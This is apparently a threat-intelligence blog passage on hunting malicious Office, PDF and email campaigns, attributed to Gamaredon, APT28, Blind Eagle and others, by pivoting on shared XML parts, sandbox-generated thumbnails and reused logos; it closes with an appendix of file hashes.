Figure 10: [Content_Types].xml shared in multiple documents by Gamaredon Group

There are a large number of samples that share the same [Content_Types].xml. It's important to highlight that these [Content_Types].xml files are not necessarily exclusively used by Gamaredon, and can be found in other legitimate files created by users worldwide. However, some of these [Content_Types].xml might be interesting to monitor.

Styles.xml files are usually less generic, which should make them a better candidate to monitor:

Figure 11: Styles.xml shared in multiple documents by Gamaredon Group

We see styles.xml files are less reused than [Content_Types].xml. This could be because some of the samples used by this actor for distribution are created from scratch or reusing legitimate documents.

We used identified patterns in the styles.xml files to launch a retrohunt on VirusTotal. Figure 12 visually represents the original set of style.xml files (left) and those that were added later after running the retrohunt (right).

Figure 12: Initial graph of the styles.xml and its parents used by Gamaredon (left). Final graph after identifying new styles.xml and their parents using retrohunt in VirusTotal (right)

One of the new styles.xml files found in our retrohunt has 17 compressed parents, meaning it was included in 17 Office files.

Figure 13: Number of parent documents for a specific styles.xml file used by Gamaredon

All the parents were malicious, some of them identical and the rest very similar between them. The content of many of them referred to "Foreign institutions of Ukraine - Embassy of Ukraine in Hungary," containing a table with phone numbers and information about the embassy, such as social media links and email accounts. Here's an example:

Figure 14: Document used by Gamaredon in one of its campaigns that includes multiple images which can be used to monitor new samples

The information for social media includes the logos of these platforms, such as the Facebook logo, Skype logo, an image of a telephone, etc. By pivoting, on the image of the Facebook icon, we find that it has 12 additional compressed parents, meaning it appears in 12 documents, all of them sharing the same styles.xml file.

Visualizing all together, we find a set of about 12-14 images used within the same timeframe by the actor. All of these images can be found in the “Embassy of Ukraine in Hungary” document.

Figure 15: Pivoting through the Facebook image that included the document in Figure 14

There's a pattern evident in the previous image where different images were included in files uploaded simultaneously. This pattern is associated with multiple documents used in the same campaign of the Embassy of Ukraine in Hungary, all of them were using the same social media images explained before.

Styles.xml shared between threat actors

Another aspect we explored was if different threat actors shared similar styles.xml files in their documents. Styles.xml files are somewhat more specific and unique than [Content_Types].xml files because they can contain styles created by threat actors or by legitimate entities that originally created the document and then were modified by the actor. This makes them stand out more and can help in identifying threat actor activity.

This doesn't necessarily imply they share information to conduct separate operations, although in some cases, it could be a scenario worth considering.

Figure 16: styles.xml shared between different threat actors

Of all styles.xml files related to actors in our initial set, only six of them were found to be shared by at least two actors. Some styles defined by the styles.xml file are very generic and could identify almost any type of file. However, there are others that could be interesting to explore further.

An interesting case is the Styles.xml file, which seems to be shared by Razor Tiger, APT28, and UAC-0099. Specifically, the samples from APT28 and UAC-0099 are attract because they were uploaded to VirusTotal within short time frames, suggesting they might belong to the same threat actor.

The file 243bab79863327915c315c188c0589202f64b3500a3fee3e2c9f3d34e8e1f154 attributed to APT28, the file 2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed attributed to UAC-0099, and the file 61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1 attributed to UAC-0099 all share the same styles.xml and [Content_Types].xml.

You can see the list of hashes in the appendix of this blog

[Content_Types].xml shared between threat actors

Like in the previous case, we checked if there were Office documents among different threat actors sharing [Content_Types].xml:

Figure 17: [Content_Types].xml shared between different threat actors

In this case, there are eleven [Content_Types].xml files that are shared by at least two different actors.

An interesting case here is the file dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a, which is shared by Gamaredon, APT37, Mustang Panda, APT28, SideCopy, and UAC-0099. Again, there could be different explanations for this.

Another interesting case that is worth analyzing in detail is [Content_Types].xml with hash 4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d, which is only shared by APT28 and APT29.

You can see the list of hashes in the appendix of this blog

AI to the rescue

The images reused by attackers seem to be a promising idea we decided to further explore.

We used the VirusTotal API to download and unzip a set of Office documents used for delivery, this way we obtained all the images. Then we used Gemini to automatically describe what these images were about.

Figure 18: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors

Figure 18 shows some examples of images that were incorporated by certain actors. There were also other results that were not helpful, mainly related to images that did not show a logo or anything specific that indicated what they were.

Figure 19: Results obtained with Gemini after processing some of the embedded images in the documents used by the threat actors

Using the VirusTotal API to obtain documents that you might be looking for and combining the results with Gemini to analyze possible images automatically, can potentially help analysts to monitor potential suspicious documents and create your own database of samples using specific images, for example Government images or specific images about companies. This approach is interesting not only for threat hunting but also for brand monitoring.

PDF Documents

Images dropped by Acrobat Reader

Unlike Office documents, PDF files don't contain embedded XML files or images, although some PDF files may be created from Office documents. Some of our sandboxes include Adobe Acrobat Reader to open PDF documents which generates a thumbnail of the first page in BMP format. This image is stored in the directory C:\Users\\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons. Consequently, our sandboxes provide this BMP image as a dropped file from the PDF, allowing us to pivot.

To illustrate this functionality, see Figure 20 attributed to Blind Eagle, a cybercrime actor associated with Latin America.

Figure 20: Content of a PDF file related to Blind Eagle threat actor

Figure 20 was provided by our sandbox. In the "relations" tab, we can see the BMP image as a dropped file:

Figure 21: BMP file generated by the sandbox that can be used for pivoting

The BMP file itself also shows relations, in particular up to 6 PDF files in the "execution parents" section. In other words, there are other PDFs that look exactly the same as the initial one.

Typically, many actors engaged in financial crime activities utilize widely spread PDF files to deceive their victims, making this approach highly valuable. Another interesting example we found involves phishing activities targeting a Russian bank called "Tinkoff Bank."

The PDF files urge victims to accept an invitation from this bank to participate in a project.

Figure 22: The content of a PDF file used by cybercrime actors

Applying the same approach we identified 20 files with identical content, most of them classified as malicious by AV engines.

Figure 23: BMP file generated by the sandbox that can be used for pivoting, in this case having other 20 PDF with the same image

There are some limitations to this approach. For instance, the PDF file might be slightly modified (font size, some letter/word, color, …) which would generate a completely different hash value for the thumbnail we use to pivot.

Images dropped by Acrobat Reader

Just like the BMP files generated by Acrobat Reader, there are other interesting files that might be dropped during sandbox detonation. These artifacts can be useful on some occasions.

The first example is a JavaScript file dropped in another PDF attributed to Blind Eagle.

Figure 24: BMP file generated by the sandbox that can be used for pivoting, another example of Blind Eagle threat actor

The dropped JavaScript file's name during the PDF execution was "Chrome Cache Entry: 566" indicating that this file was likely generated by opening an URL through Chrome, possibly triggered by a sandbox click on a link within the PDF. Examining the file's contents, we observe some strings and variables in Spanish.

Figure 25: Artifact generated by the sandbox via Google Chrome when connecting to a domain

The strings “registerResourceDictionary”, “sampleCustomStringId”, “rf_RefinementTitle_ManagedPropertyName” are related to Microsoft SharePoint as we were able to confirm. These files were probably generated after visiting sites that have Microsoft Sharepoint functionalities. We found that all the PDFs containing this artifact dropped by Google Chrome came from a website belonging to the Government of Colombia.

Figure 26: Flow of artifact generation related to Google Chrome that can be used for pivoting in VirusTotal

Email files

Many threat actors incorporate images in their emails, such as company logos, to deceive victims. We used this to identify several mailing campaigns where the same footer was used.

Campaign impersonating universities

On November 13, 2023, we details about a new campaign impersonating universities, primarily located in Latin America. By leveraging the presence of social network logos in the footer, we were able to find more universities in different continents targeted by the same attacker.

Figure 27: Email impersonating a university that contains multiple images

Figure 27 shows several images, including the University of Chile's logo and building, as well as images related to social networks like YouTube, Facebook, and Twitter.

Pivoting through the images related to the University of Chile doesn't yield good results, as it's too specific. However, if we pivot through the images of the social media footer, represented as email attachments, we can observe multiple files using the same logo.

Figure 28: Using the images from the email footer to pivot and identify new emails

Just by analyzing one of the social media logos, we saw 33 email parents, all of them related to the same campaign.

Figure 29: Other emails identified through image pivoting techniques

Campaigns impersonating companies

Another usual case is adding a company logo in the email signatures to enhance credibility. Delivery companies, banks, and suppliers are some of the most observed images during our research.

For example, this email utilizes the corporate image of China Anhui Technology Import and Export Co Ltd in the footer.

Figure 30: Email impersonating a Chinese organization using the company logo in the footer

Pivoting through the image we found 20 emails using the same logo.

Figure 31: Other emails identified through image pivoting techniques

Wrapping up

We can potentially trace malicious actors by examining artifacts linked to the initial spreading documents, and in the case of images, AI can help us automate potential victim identification and other hunting aspects.

In order to make this even easier, we are planning to incorporate a new bundled_files field into the IOCs JSON structure, which basically will help to create livehunt rules. In the meantime you can use vt_behaviour_files_dropped.sha256 for those scenarios where the files are dropped.

In certain situations, the styles.xml and [Content_Types].xml files within office documents can provide valuable clues for identifying and tracking the same threat actor. The method presented here offers an alternative to traditional hunting or pivoting techniques, serving as a valuable addition to a team's hunting activities.

We hope you found this research interesting and useful, and as always we are happy to hear your feedback.

Happy hunting!

APPENDIX

[Content_types].xml shared between threat actors

[Content_Type].xml sha256	Shared by
3d8578fd41d766740a1f1ddef972a081436a2d70ab1e9552a861e58d8bbf5321	APT33, APT32
4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d	APT29, APT28
4f7fa7433484b4e655d185719613e2f98d017590146d15eedc1aa1d967636b3a	FIN7, Gamaredon, APT28, APT32
529739886f6402a9cd5a8064ece73eef19c597ef35c0bc8d09390e8b4de9041b	FIN7, APT33, TA505, Mustang Panda
688dca40507fb96630f3df80442266a0354e7c24b7df86be3ea57069b25d12c6	Gamaredon, APT33
6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51	Gamaredon, Hazy Tiger, APT33,
7796c382cd4c7c4ae3bcf2eed4091fbb20a2563ca88f2aecadb950ad9cf661f8	Razor Tiger, APT28, UAC-0099
b4fa7f3faa0510e4d969219bceec2a90e8a48ff28e060db3cdd37ce935c3779c	Razor Tiger, SideCopy
dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a	Gamaredon, APT37, Mustang Panda, APT28, UAC-0099, SideCopy
fe98b3bcf96f9c396eb9193f0f9484ef01d3017257300cc76098854b1f103b69	FIN7, Hazy Tiger
ff5a5ba3730a8d2ec0cbad39e5edf4ad502107bd0ef8a5347f29262b3dfe8a43	Mustang Panda, APT32

styles.xml shared between threat actors

Styles.xml sha256	Shared by
13ed55637980452662cb6838a2931a5e54fbed5881bcbae368b3d189d3a01930	APT28, UAC-0099, Razor Tiger
2de1fc9c48c4b0190361c49cdb053fd39cf81e32f12c82d08f88aec34358257f	Hazy Tiger, Gamaredon, APT33
59df7787c7cf5408481ae149660858d3af765a0c2cd63d6309b151380f92adb2	TA505, Gamaredon
8f590f608f0719404a1731bb70a6ce2db420fd61e5a387d5b3091d47c7e21ac9	APT28, FIN7, Razor Tiger, APT32, APT33
de392cd4bf1d650a9cf8c6d24e05e0605bf4eaf1518710f0307d8aceb9e5496c	Hazy Tiger, FIN7
e16f84c5fd1df6af1a1f2049f7862f4ea460765863476afb17e78edee772d35b	APT32, SideCopy, Mustang Panda, Razor Tiger